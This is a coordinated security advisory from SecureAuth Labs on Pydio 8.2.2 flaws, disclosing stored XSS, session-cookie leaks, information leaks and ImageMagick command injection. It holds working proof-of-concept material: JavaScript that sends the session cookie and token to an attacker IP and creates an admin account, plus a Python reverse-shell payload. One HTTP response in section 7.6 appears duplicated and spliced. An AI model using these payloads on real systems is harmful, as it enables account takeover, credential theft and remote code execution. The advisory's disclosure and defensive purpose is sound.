Pydio 8 Command Execution / Cross Site Scripting

`SecureAuth - SecureAuth Labs Advisory  
http://www.secureauth.com/  
  
Pydio 8 Multiple Vulnerabilities  
  
1. *Advisory Information*  
  
Title: Pydio 8 Multiple Vulnerabilities  
Advisory ID: SAUTH-2019-0002  
Advisory URL:  
https://www.secureauth.com/labs/advisories/pydio-8-multiple-vulnerabilities  
Date published: 2019-03-28  
Date of last update: 2019-03-28  
Vendors contacted: Pydio  
Release mode: Coordinated release  
  
2. *Vulnerability Information*  
  
Class: Argument Injection or Modification [CWE-88], Argument Injection  
or Modification [CWE-88], Information Exposure [CWE-200], Improper  
Neutralization of Input During Web Page Generation  
('Cross-site Scripting') [CWE-79], Information Exposure [CWE-200],  
Information Exposure [CWE-200]  
Impact: Code execution, Security bypass, Information leak  
Remotely Exploitable: Yes  
Locally Exploitable: Yes  
CVE Name: CVE-2019-10049, CVE-2019-10048, CVE-2019-10045, CVE-2019-10047,  
CVE-2019-10046, CVE-2019-10046  
  
3. *Vulnerability Description*  
Pydio [1] website states that:  
...Pydio, an open source EFSS (Enterprise File Synchronization and  
Sharing) solution that can be deployed On-Premise or in a Hybrid / Cloud  
environment. Pydio is available either through a Community distribution  
(Ideal for home use) that is free forever or an Enterprise which  
provides all the features, support and compliance to secure file sharing.  
Pydio is sold in more than 25 countries, from Cupertino to Singapore,  
and is used by leading brands around the world, such as Nikon, Credit  
Agricole, Dexia... Pydio also serves education and government clients,  
with major references such as Cambridge University (UK) and ADEME  
(France).  
  
Multiple vulnerabilities were found in Pydio 8 (latest version 8.2.2),  
which allows an attacker with regular user access to the application and  
by tricking an administrator account to open a shared URL bookmark  
through the application, to obtain the victim's session identifiers in  
order to impersonate him/her and to perform actions such as create a new  
user administrator account. After gaining privileged access to the  
application the attacker can leverage another vulnerability to perform  
OS command injection under the privileges of the user account running  
the web server.  
  
4. *Vulnerable Packages*  
  
. Pydio 8.2.2 - Latest version at the time of testing.  
. Older versions are probably affected too, but they were not checked.  
  
5. *Vendor Information, Solutions and Workarounds*  
  
Pydio published v8.2.3 that fixes all the reported vulnerabilities.  
  
6. *Credits*  
  
These vulnerabilities were discovered and researched by Ramiro Molina  
from SecureAuth Security Consulting Services. The publication of this  
advisory was coordinated by Leandro Cuozzo from SecureAuth Advisories  
Team.  
  
7. *Technical Description / Proof of Concept Code*  
  
7.1. *Privilege escalation vector based in multiple vulnerabilities*  
  
[CVE-2019-10049]  
By chaining vulnerabilities it is possible for an attacker with regular  
user access to the web application to attempt to trick an administrator  
user to open a link shared through the application, that in turn opens a  
shared file that contains JavaScript code that is executed in the  
context of the victim user to obtain sensitive information such as  
session identifiers (session cookie and secure token) and perform  
actions on behalf of him/her.  
  
Note: if the targeted users are not administrators, any other action on  
behalf of that user could also be achieved, to for example obtain  
sensitive files stored in their accounts or impersonate them.  
  
Attack vector steps:  
  
1. Authenticated in the web application with a regular user account, go  
to "My Files" and upload a file named for example pydio_xss.html (use  
the .html extension) with the following content. The PoC once executed  
performs several requests to:  
  
. Obtain a "secure_token" for the user, which is a CSRF prevention token.  
. Obtain the session cookie for the current user.  
. Send the two sensitive tokens to the attacker, this allows to  
impersonate the victim user.  
. Change the "context to configuration".  
. Create a new user account named "admin99" with password "password1".  
. Change the user role of the created user to administrator.  
  
Note: change the IP address and port number (the example ones are the  
IP 192.168.56.1 and port 9999).  
  
PoC pydio_xss.html file:  
  
/-----  
<html>  
<body>  
<script type="text/javascript">  
console.log("Starting...");  
var req0 = new XMLHttpRequest();  
req0.open('GET', "/welcome/", true);  
req0.setRequestHeader("Accept","text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");  
req0.send();  
req0.onload = function() {  
var res = req0.responseText.match(/SECURE_TOKEN.*?,/)[0];  
var secure_token = res.split(/"/)[2] ;  
var req1 = new XMLHttpRequest();  
req1.open('POST', "index.php", true);  
req1.setRequestHeader('Content-Type',  
'application/x-www-form-urlencoded');  
req1.send("get_action=get_sess_id&secure_token=" + secure_token);  
req1.onload = function() {  
var session_cookie = req1.responseText;  
var req2 = new XMLHttpRequest();  
req2.open('POST', "http://192.168.56.1:9999/creds", true);  
req2.setRequestHeader('Content-Type',  
'application/x-www-form-urlencoded');  
req2.send("Session Cookie: " + session_cookie + "; secure_token: "  
+ secure_token);  
req2.onload = function() {  
console.log("I just sent your protected session cookie.");  
};  
//switch "repository" to configuration  
var req3 = new XMLHttpRequest();  
req3.open('POST', "/index.php", true);  
req3.setRequestHeader('Content-Type',  
'application/x-www-form-urlencoded');  
  
req3.send("get_action=switch_repository&repository_id=ajxp_conf&secure_token="  
+ secure_token);  
req3.onload = function() {  
console.log("Creating a new admin user...");  
var req4 = new XMLHttpRequest();  
req4.open('POST', "/index.php", true);  
req4.setRequestHeader('Content-Type',  
'application/x-www-form-urlencoded');  
  
req4.send("get_action=create_user&new_user_login=admin99&new_user_pwd=password1&group_path=&secure_token="  
+ secure_token);  
req4.onload = function() {  
console.log(req4.responseText);  
console.log("Promoting user to admin...");  
var req5 = new XMLHttpRequest();  
req5.open('POST', "/index.php", true);  
req5.setRequestHeader('Content-Type',  
'application/x-www-form-urlencoded');  
  
req5.send("get_action=edit&sub_action=post_json_role&role_id=AJXP_USR_%2Fadmin99&json_data=%7B%22ROLE%22%3A%7B%22ACL%22%3A%7B%7D%2C%22MASKS%22%3A%7B%7D%2C%22ACTIONS%22%3A%7B%7D%2C%22PARAMETERS%22%3A%7B%7D%2C%22APPLIES%22%3A%7B%7D%2C%22USER%22%3A%7B%22LOCK%22%3Afalse%2C%22PROFILE%22%3A%22admin%22%2C%22ROLES%22%3A%5B%22AJXP_GRP_%2F%22%2C%22AJXP_USR_%2Fadmin99%22%5D%7D%7D%2C%22METADATA%22%3A%7B%7D%2C%22USER%22%3A%7B%22LOCK%22%3Afalse%2C%22PROFILE%22%3A%22admin%22%2C%22ROLES%22%3A%5B%22AJXP_GRP_%2F%22%2C%22AJXP_USR_%2Fadmin99%22%5D%7D%7D&secure_token="  
+ secure_token);  
req5.onload = function() {  
console.log(req5.responseText);  
};  
};  
};  
};  
};  
</script>  
</body>  
</html>  
-----/  
  
2. Still in "My Files" create a new URL bookmark with the following URL  
and a label of your choice. Note that selecting a good label can help  
into tricking an administrator user into opening the bookmark. The URL  
must reference the filename uploaded in the previous step. For this  
example, the file is named '"pydio_xss.html"':  
  
/-----  
http://192.168.56.102/index.php?get_action=open_file&repository_id=inbox&file=%2Fpydio_xss.html  
-----/  
  
3. Select each the uploaded HTML file and share it with the administrator  
user account by clicking on share and in the popup, window select the  
target user (or users if the administrator account is not known) and  
click on save.  
  
4. Do the same with the URL Bookmark and share it with the victim  
administrator user/s.  
  
5. On a command prompt with for example ncat set a listener for the  
incoming post request with the session identifiers.  
  
6. Once the administrator opens the URL Bookmark the JavaScript code in  
the uploaded file will be executed, the session identifiers will be  
posted to the attacker's machine and a new administrator user (named  
"admin99" with password "password1") will be created.  
  
7. The attacker can login with the created administrator user or can  
leverage the session identifiers to impersonate the victim user.  
  
Note: after gaining access as an administrator to the web application an  
attacker can leverage the OS command injection vulnerability described  
in this advisory to run system commands on the underling operative  
system with the local user running the web server.  
  
7.2. *OS command injection by parameter abuse in ImageMagick plugin*  
  
[CVE-2019-10048]  
The 'ImageMagick' plugin that is installed by default in Pydio 8.2.2  
does not perform the appropriate validation and sanitization of user  
supplied input in the plugin's configuration options allowing arbitrary  
shell commands to be entered that result in command execution on the  
underlying operative system with the privileges of the local user  
running the web server. The attacker will need to be authenticated into  
the application with an administrator user account in order to be able  
to edit the affected plugin configuration. In this advisory a privilege  
escalation vector by levering other vulnerabilities from a regular user  
standpoint is also described.  
  
Proof of Concept:  
  
1. Logged in with an administrator account into the web application,  
go to Settings -> Editors.  
  
2. Disable the PDF Viewer plugin.  
  
3. Enable the ImageMagick plugin.  
  
4. Click on Edit ImageMagick plugin settings.  
  
5. In the popup window, add at the end of the current settings for the  
"Thumbs options" and "Images options" parameters the following example  
payload to run a python reverse shell (where in the example the IP  
address is 192.168.56.1 and the port number is 9999, edit accordingly)  
and save the settings. An example payload is:  
  
/-----  
; python -c 'import  
socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.1",9999));os.dup2(s.fileno(),0);  
os.dup2(s.fileno(),1);  
os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);';  
-----/  
  
6. On a command prompt with for example ncat set a listener for the  
incoming reverse shell.  
  
7. With the administrator account, or any other account upload a test  
PDF file to a workspace and observe that a reverse shell is received.  
  
Affected source code:  
  
The affected source code section is located in the file:  
'"plugins/editor.imagick/IMagickPreviewer.php" line #380'. The following  
code section is where the vulnerability is located. Note that the user  
provided parameters are not validated and sanitized before construction  
the "$cmd" string an being passed to the exec() function.  
  
/-----  
$customOptions = $this->getContextualOption($ctx, "IM_CUSTOM_OPTIONS");  
$customEnvPath = $this->getContextualOption($ctx, "ADDITIONAL_ENV_PATH");  
$viewerQuality = $this->getContextualOption($ctx, "IM_VIEWER_QUALITY");  
$thumbQuality = $this->getContextualOption($ctx, "IM_THUMB_QUALITY");  
if (empty($customOptions)) {  
$customOptions = "";  
}  
if (!empty($customEnvPath)) {  
putenv("PATH=".getenv("PATH").":".$customEnvPath);  
}  
$params = $customOptions." ".( $this->extractAll? $viewerQuality :  
$thumbQuality );  
$cmd = $this->getContextualOption($ctx, "IMAGE_MAGICK_CONVERT")."  
".$params." ".escapeshellarg(($masterFile).$pageLimit)."  
".escapeshellarg($tmpFileThumb);  
$this->logDebug("IMagick Command : $cmd");  
session_write_close(); // Be sure to give the hand back  
exec($cmd, $out, $return);  
-----/  
  
7.3. *Current user AjaXplorer session cookie value disclosure*  
  
[CVE-2019-10045]  
The 'AjaXplorer' session cookie is correctly set with the 'HTTPOnly'  
flag to prevent access to its value from scripts. The affected "action"  
'get_sess_id' discloses the session cookie value in the response body  
enabling scripts to get access to its value. This identifier can be  
reused by an attacker to impersonate a user and perform actions on  
behalf of him/her if the session is still active.  
  
Proof of Concept:  
  
The response to the following HTTP POST request with the parameter  
'get_action=get_sess_id' returns the current user session identifier  
('AjaXplorer' session cookie value) in the response.  
  
Request:  
  
/-----  
POST /index.php? HTTP/1.1  
Host: 192.168.56.101  
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:64.0)  
Gecko/20100101 Firefox/64.0  
Accept: */*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: http://192.168.56.101/ws-inbox/  
content-type: application/x-www-form-urlencoded; charset=UTF-8  
origin: http://192.168.56.101  
Content-Length: 68  
Connection: close  
Cookie: AjaXplorer=1ln7fa60h1ajsapm7ha45sge26; ajxp_licheck=ok  
  
get_action=get_sess_id&secure_token=zZ6lpJaRUovEYm0imb839L8YhWI1UHZK  
-----/  
  
Response:  
  
/-----  
HTTP/1.1 200 OK  
Date: Wed, 30 Jan 2019 22:21:18 GMT  
Server: Apache/2.4.27 (Red Hat) OpenSSL/1.0.2k-fips PHP/5.6.25  
X-Powered-By: PHP/5.6.25  
Expires: Thu, 19 Nov 1981 08:52:00 GMT  
Cache-Control: no-store, no-cache, must-revalidate, post-check=0,  
pre-check=0  
Pragma: no-cache  
Connection: close  
Content-Type: text/plain;charset=UTF-8  
Content-Length: 26  
  
1ln7fa60h1ajsapm7ha45sge26  
-----/  
  
7.4. *Stored Cross-site scripting (XSS) in file view feature*  
  
[CVE-2019-10047]  
A stored cross-site scripting vulnerability exists in the affected web  
application that can be exploited by levering the file upload and file  
preview features of the application. An authenticated attacker can  
upload an HTML file containing Javascript code and afterword's a file  
preview URL can be used to access the uploaded file.  
If a malicious user shares an uploaded HTML file containing JavaScript  
code with another user of the application and tricks an authenticated  
victim into accessing an URL (i.e. by clicking in a link) that results  
in the HTML code being interpreted by the web browser and the included  
JavaScript code being executed under the context of the victim user  
session.  
  
Proof of Concept:  
  
With an authenticated user go to "My Files" and upload a HTML file as  
the following PoC, which is named for example "xss.html":  
  
/-----  
<html>  
<body>  
<script type="text/javascript">  
alert("SecureAuth");  
</script>  
</body>  
</html>  
-----/  
  
In another tab of the web browser access the following URL, and notice  
that the JavaScript code is executed, and a popup alert is displayed:  
  
/-----  
http://192.168.56.102/index.php?secure_token=&get_action=open_file&repository_id=1&file=%2Fxss.html  
-----/  
  
Request:  
  
/-----  
GET  
/index.php?secure_token=&get_action=open_file&repository_id=1&file=%2Fxss.html  
HTTP/1.1  
Host: 192.168.56.102  
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:64.0)  
Gecko/20100101 Firefox/64.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Connection: close  
Cookie: AjaXplorer=gdn92c6maohf28lt2noiso1891; ajxp_licheck=ok  
Upgrade-Insecure-Requests: 1  
-----/  
  
Response:  
  
/-----  
HTTP/1.1 200 OK  
Date: Wed, 30 Jan 2019 22:00:21 GMT  
Server: Apache/2.4.34 (Red Hat) OpenSSL/1.0.2k-fips PHP/5.6.25  
X-Powered-By: PHP/5.6.25  
Expires: Thu, 19 Nov 1981 08:52:00 GMT  
Cache-Control: public  
Pragma: no-cache  
Content-Disposition: inline; filename="xss.html"  
Content-Length: 66  
Connection: close  
Content-Type: text/html; charset=us-ascii; name="xss.html"  
  
<html>  
<body>  
<script>alert("SecureAuth")</script>  
</body>  
</html>  
-----/  
  
Share the file with an administrator user, and logged in with that user  
account access the "Shared Files" repository and in another tab, access  
following URL and notice that the JavaScript code is also executed:  
  
/-----  
http://192.168.56.102/index.php?get_action=open_file&repository_id=inbox&file=%2Fxss.html  
-----/  
  
Request:  
  
/-----  
GET /index.php?get_action=open_file&repository_id=inbox&file=%2Fxss.html  
HTTP/1.1  
Host: 192.168.56.102  
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:64.0)  
Gecko/20100101 Firefox/64.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Connection: close  
Cookie: AjaXplorer=6vh2o75udh253f6lu8p99cpmr5; ajxp_licheck=ok  
Upgrade-Insecure-Requests: 1  
-----/  
  
Response:  
  
/-----  
HTTP/1.1 200 OK  
Date: Wed, 30 Jan 2019 22:01:05 GMT  
Server: Apache/2.4.34 (Red Hat) OpenSSL/1.0.2k-fips PHP/5.6.25  
X-Powered-By: PHP/5.6.25  
Expires: Thu, 19 Nov 1981 08:52:00 GMT  
Cache-Control: public  
Pragma: no-cache  
Content-Disposition: inline; filename="xss.html"  
Content-Length: 66  
Connection: close  
Content-Type: text/html; charset=us-ascii; name="xss.html"  
  
<html>  
<body>  
<script>alert("SecureAuth")</script>  
</body>  
</html>  
-----/  
  
7.5. *Unauthenticated Pydio and PHP libraries versions information  
disclosure*  
  
[CVE-2019-10046]  
An unauthenticated attacker can obtain information about the Pydio  
version and PHP libraries and their versions by performing a HTTP POST  
request to '/index.php' and including the parameters  
'"get_action=display_doc& doc_file=CREDITS"' in the body.  
  
Proof of Concept:  
  
Request:  
  
/-----  
POST /index.php? HTTP/1.1  
Host: 192.168.56.102  
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:64.0)  
Gecko/20100101 Firefox/64.0  
Accept: */*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: http://192.168.56.102/welcome/  
content-type: application/x-www-form-urlencoded; charset=UTF-8  
origin: http://192.168.56.102  
Content-Length: 53  
Connection: close  
Cookie: AjaXplorer=a; ajxp_licheck=ok  
  
get_action=display_doc&doc_file=CREDITS&secure_token=  
-----/  
  
Response:  
  
/-----  
HTTP/1.1 200 OK  
Date: Wed, 30 Jan 2019 22:26:49 GMT  
Server: Apache/2.4.27 (Red Hat) OpenSSL/1.0.2k-fips PHP/5.6.25  
X-Powered-By: PHP/5.6.25  
Expires: Thu, 19 Nov 1981 08:52:00 GMT  
Cache-Control: no-store, no-cache, must-revalidate, post-check=0,  
pre-check=0  
Pragma: no-cache  
Connection: close  
Content-Type: text/plain;charset=UTF-8  
Content-Length: 9246  
  
<img src="plugins/gui.ajax/PydioLogo250.png"/>  
<br><div style="padding-left:10px;"><div  
style="font-size:0.8em;">Version 8.2.2 - 2018-10-10  
<br>Copyright 2007-2017 Abstrium SAS  
<br>The latest code can be found at https://pydio.com/.  
<br></div>  
...  
TRUNCATED  
...  
<br>  
<br><div class="title">PHP Libraries</div>  
<br>  
<br> aws/aws-sdk-php 3.19.18 Apache-2.0  
<br> commerceguys/guzzle-oauth2-plugin v2.1.1 MIT  
<br> dapphp/securimage 3.6.4 BSD  
<br> davegardnerisme/nsqphp dev-master 60f12ad none  
<br> evenement/evenement v2.0.0 MIT  
<br> firebase/php-jwt v2.2.0 BSD-3-Clause  
<br> gimler/guzzle-description-loader v0.0.4 MIT  
<br> guzzlehttp/command 0.7.1 MIT  
<br> guzzlehttp/guzzle 5.3.1 MIT  
<br> guzzlehttp/guzzle-services 0.5.0 MIT  
<br> guzzlehttp/promises 1.2.0 MIT  
<br> guzzlehttp/psr7 1.3.1 MIT  
<br> guzzlehttp/ringphp 1.1.0 MIT  
<br> guzzlehttp/streams 3.0.0 MIT  
<br> meenie/javascript-packer 1.1 LGPL 2.1  
<br> mtdowling/jmespath.php 2.3.0 MIT  
<br> nikic/fast-route v1.0.1 BSD-3-Clause  
<br> phpseclib/phpseclib 2.0.3 MIT  
<br> psr/http-message 1.0.1 MIT  
<br> psr/log 1.0.2 MIT  
<br> react/cache v0.4.1 MIT  
<br> react/child-process v0.4.1 MIT  
<br> react/dns v0.4.3 MIT  
<br> react/event-loop v0.4.2 MIT  
<br> react/http v0.4.1 MIT  
<br> react/http-client v0.4.13 MIT  
<br> react/promise v2.4.1 MIT  
<br> react/react v0.4.2 MIT  
<br> react/socket v0.4.3 MIT  
<br> react/socket-client v0.4.5 MIT  
<br> react/stream v0.4.4 MIT  
<br> sabre/dav 1.8.10 BSD-3-Clause  
<br> sabre/vobject 2.1.7 BSD-3-Clause  
<br> symfony/config v3.1.5 MIT  
<br> symfony/console v3.1.5 MIT  
<br> symfony/debug v3.1.5 MIT  
<br> symfony/filesystem v3.1.5 MIT  
<br> symfony/polyfill-mbstring v1.2.0 MIT  
<br> symfony/yaml v3.1.5 MIT  
<br> zendframework/zend-diactoros 1.3.7 BSD-2-Clause  
<br>  
<br>  
<br><div class="title">Other Plugins</div>  
<br> PThumb.php <a target="_blank"  
href="http://www.phpclasses.org">http://www.phpclasses.org</a> (LPGL)  
<br> OpenLayers <a target="_blank"  
href="http://www.openlayers.org">http://www.openlayers.org</a> (BSD)  
<br> Video-js <a target="_blank"  
href="http://www.videojs.com/">http://www.videojs.com/</a> (LGPL)  
<br> Zend Lucene <a target="_blank"  
href="http://www.zend.com/">http://www.zend.com/</a> (New BSD)  
<br> SoundManager : <a target="_blank"  
href="http://www.schillmania.com/projects/soundmanager2/">http://www.schillmania.com/projects/soundmanager2/</a>  
(BSD)  
<br> CAS Driver (Apache 2): https://github.com/Jasig/phpCAS  
<br>  
<br></div>  
-----/  
  
7.6. *Unauthenticated Pydio "Boot Config" information disclosure*  
  
[CVE-2019-10046]  
An unauthenticated attacker can obtain information about the Pydio  
configuration including session timeout and license information by  
performing a HTTP GET request to '"/index.php?get_action=get_boot_conf"'.  
  
Proof of Concept:  
  
Request:  
  
/-----  
GET /index.php?get_action=get_boot_conf HTTP/1.1  
Host: 192.168.56.102  
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:64.0)  
Gecko/20100101 Firefox/64.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Connection: close  
Upgrade-Insecure-Requests: 1  
-----/  
  
Response:  
  
/-----  
HTTP/1.1 200 OK  
Date: Wed, 30 Jan 2019 22:42:53 GMT  
Server: Apache/2.4.34 (Red Hat) OpenSSL/1.0.2k-fips PHP/5.6.25  
X-Powered-By: PHP/5.6.25  
Set-Cookie: AjaXplorer=170a2docpbgl1509b2v98m90e3; path=/; HttpOnly  
Expires: Thu, 19 Nov 1981 08:52:00 GMT  
Cache-Control: no-store, no-cache, must-revalidate, post-check=0,  
pre-check=0  
Pragma: no-cache  
Set-Cookie: AJXP_GUI=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT;  
Max-Age=0  
Connection: close  
Content-Type: application/json  
Content-Length: 136855  
{  
"ajxpResourcesFolder": "plugins/gui.ajax/res",  
"ajxpServerAccess": "index.php",  
"zipEnabled": true,  
"multipleFilesDownloadEnabled": true,  
"customWording": {  
"welcomeMessage": "My Company File Sharing Platform",  
"title": "Pydio Enterprise",  
"icon": "plugins/gui.ajax/res/themes/common/images/LoginBoxLogo.png",  
"iconWidth": "250px",  
"iconHeight": "120px",  
"iconOnly": true,  
"titleFontSize": ""  
},  
"usersEnabled": true,  
"loggedUser": false,  
"currentLanguage": "en",  
"session_timeou Date: Wed, 30 Jan 2019 22:42:53 GMT  
Server: Apache/2.4.34 (Red Hat) OpenSSL/1.0.2k-fips PHP/5.6.25  
X-Powered-By: PHP/5.6.25  
Set-Cookie: AjaXplorer=170a2docpbgl1509b2v98m90e3; path=/; HttpOnly  
Expires: Thu, 19 Nov 1981 08:52:00 GMT  
Cache-Control: no-store, no-cache, must-revalidate, post-check=0,  
pre-check=0  
Pragma: no-cache  
Set-Cookie: AJXP_GUI=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT;  
Max-Age=0  
Connection: close  
Content-Type: application/json  
Content-Length: 136855  
{  
"ajxpResourcesFolder": "plugins/gui.ajax/res",  
"ajxpServerAccess": "index.php",  
"zipEnabled": true,  
"multipleFilesDownloadEnabled": true,  
"customWording": {  
"welcomeMessage": "My Company File Sharing Platform",  
"title": "Pydio Enterprise",  
"icon": "plugins/gui.ajax/res/themes/common/images/LoginBoxLogo.png",  
"iconWidth": "250px",  
"iconHeight": "120px",  
"iconOnly": true,  
"titleFontSize": ""  
},  
"usersEnabled": true,  
"loggedUser": false,  
"currentLanguage": "en",  
"session_timeout": 1440,  
"client_timeout": 1440,  
"client_timeout_warning": 3,  
  
...  
TRUNCATED  
...  
  
"helper_booster.updater.force.2": "force reinstall",  
"helper_booster.updater.force.3": "?"  
},  
"SECURE_TOKEN": "OCGdu2uIsEJUWYPHaPOV5V35pNPhSuDz",  
"streaming_supported": "true",  
"theme": "material",  
"ajxpImagesCommon": true,  
"licence_features": [  
"TRIAL",  
"footer",  
"splash",  
"customCopyright:<a href='https://pydio.com'>Pydio Enterprise  
Distribution</a> - Trial version valid until 2019-02-20."  
]  
}t": 1440,  
"client_timeout": 1440,  
"client_timeout_warning": 3,  
  
...  
TRUNCATED  
...  
  
"helper_booster.updater.force.2": "force reinstall",  
"helper_booster.updater.force.3": "?"  
},  
"SECURE_TOKEN": "OCGdu2uIsEJUWYPHaPOV5V35pNPhSuDz",  
"streaming_supported": "true",  
"theme": "material",  
"ajxpImagesCommon": true,  
"licence_features": [  
"TRIAL",  
"footer",  
"splash",  
"customCopyright:<a href='https://pydio.com'>Pydio Enterprise  
Distribution</a> - Trial version valid until 2019-02-20."  
]  
}  
-----/  
  
8. *Report Timeline*  
2019-02-11: SecureAuth sent an initial notification to Pydio including  
a draft advisory.  
2019-02-11: Pydio confirmed the reception of the advisory.  
2019-02-15: Pydio informed they were testing the vulnerabilities and  
they will answer back next week.  
2019-02-15: SecureAuth thanked the update.  
2019-02-20: Pydio requested a clarification about some vulnerabilities.  
2019-02-21: SecureAuth sent additional information to Pydio.  
2019-03-08: SecureAuth requested an update.  
2019-03-08: Pydio replied saying they were planning to release their  
fix next week and asked. SecureAuth to test this new version.  
2019-03-08: SecureAuth thanked the update and agreed to test the new  
version.  
2019-03-12: Pydio sent the fixed version.  
2019-03-15: Pydio asked for an update and proposed to release its fix on  
Tuesday 19th.  
2019-03-15: SecureAuth informed Pydio that the fixed version was tested  
and all the reported vulnerabilities were addressed. In addition,  
SecureAuth proposed to postpone the release date to Thursday 21th.  
2019-03-18: Pydio thanked the answer and agreed on the proposal.  
2019-03-21: Pydio released the version 8.2.3  
2019-03-28: Advisory SAUTH-2019-0002 published.  
  
9. *References*  
  
[1] https://pydio.com/en/about-us  
  
10. *About SecureAuth Labs*  
  
SecureAuth Labs, the research arm of SecureAuth Corporation, is charged  
with anticipating the future needs and requirements for information  
security technologies. We conduct research in several important areas of  
computer security, including identity-related attacks, system  
vulnerabilities and cyber-attack planning. Research includes problem  
formalization, identification of vulnerabilities, novel solutions and  
prototypes for new technologies. We regularly publish security  
advisories, primary research, technical publications, research blogs,  
project information, and shared software tools for public use at  
http://www.secureauth.com.  
  
11. *About SecureAuth*  
  
SecureAuth is leveraged by leading companies, their employees, their  
customers and their partners to eliminate identity-related breaches. As  
a leader in access management, SecureAuth is powering an identity  
security revolution by enabling people and devices to intelligently and  
adaptively access systems and data, while effectively keeping bad actors  
from doing harm. By ensuring the continuous assessment of risk and  
enablement of trust, SecureAuth's highly flexible platform makes it  
easier for organizations to prevent the misuse of credentials. To learn  
more, visit www.secureauth.com, call (949) 777-6959, or email us at  
[email protected]  
  
12. *Disclaimer*  
  
The contents of this advisory are copyright (c) 2019 SecureAuth, and are  
licensed under a Creative Commons Attribution Non-Commercial Share-Alike  
3.0 (United States) License:  
http://creativecommons.org/licenses/by-nc-sa/3.0/us/  
  
`